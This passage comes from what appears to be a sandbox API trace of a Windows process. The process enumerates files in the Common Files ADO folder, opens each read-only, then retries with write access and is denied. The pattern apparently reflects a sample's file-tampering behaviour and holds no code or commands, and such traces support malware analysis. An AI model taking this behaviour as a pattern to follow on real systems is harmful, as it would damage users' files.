hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0088.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.153] AreFileApisANSI () returned 1 [0088.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll", lpUsedDefaultChar=0x0) returned 53 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.154] AreFileApisANSI () returned 1 [0088.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0088.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 53 [0088.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.155] GetFileType (hFile=0x348) returned 0x1 [0088.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.155] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.155] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.155] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.155] CloseHandle (hObject=0x348) returned 1 [0088.156] AreFileApisANSI () returned 1 [0088.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0088.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll") returned 53 [0088.156] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.156] GetLastError () returned 0x5 [0088.156] GetLastError () returned 0x5 [0088.156] SetLastError (dwErrCode=0x5) [0088.156] GetLastError () returned 0x5 [0088.156] SetLastError (dwErrCode=0x5) [0088.156] GetLastError () returned 0x5 [0088.156] SetLastError (dwErrCode=0x5) [0088.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.156] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437960ad, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x437960ad, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x437960ad, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadomd28.tlb", cAlternateFileName="")) returned 1 [0088.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aa88 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0088.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.157] AreFileApisANSI () returned 1 [0088.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", lpUsedDefaultChar=0x0) returned 55 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0088.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.157] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.158] AreFileApisANSI () returned 1 [0088.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75eb8 [0088.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 55 [0088.158] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.158] GetFileType (hFile=0x348) returned 0x1 [0088.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.158] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.158] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.158] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.159] CloseHandle (hObject=0x348) returned 1 [0088.159] AreFileApisANSI () returned 1 [0088.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0088.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75d50 [0088.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 55 [0088.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.159] GetLastError () returned 0x5 [0088.159] GetLastError () returned 0x5 [0088.159] SetLastError (dwErrCode=0x5) [0088.159] GetLastError () returned 0x5 [0088.159] SetLastError (dwErrCode=0x5) [0088.159] GetLastError () returned 0x5 [0088.159] SetLastError (dwErrCode=0x5) [0088.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0088.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.159] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msador15.dll", cAlternateFileName="")) returned 1 [0088.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0088.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.160] AreFileApisANSI () returned 1 [0088.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll", lpUsedDefaultChar=0x0) returned 54 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0088.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.161] AreFileApisANSI () returned 1 [0088.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76110 [0088.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 54 [0088.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.162] GetFileType (hFile=0x348) returned 0x1 [0088.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0088.162] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.162] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.162] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.162] CloseHandle (hObject=0x348) returned 1 [0088.163] AreFileApisANSI () returned 1 [0088.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0088.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll") returned 54 [0088.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.163] GetLastError () returned 0x5 [0088.163] GetLastError () returned 0x5 [0088.163] SetLastError (dwErrCode=0x5) [0088.163] GetLastError () returned 0x5 [0088.163] SetLastError (dwErrCode=0x5) [0088.163] GetLastError () returned 0x5 [0088.163] SetLastError (dwErrCode=0x5) [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0088.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.163] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.163] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x438ed65e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x438ed65e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x438ed65e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msador28.tlb", cAlternateFileName="")) returned 1 [0088.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.164] 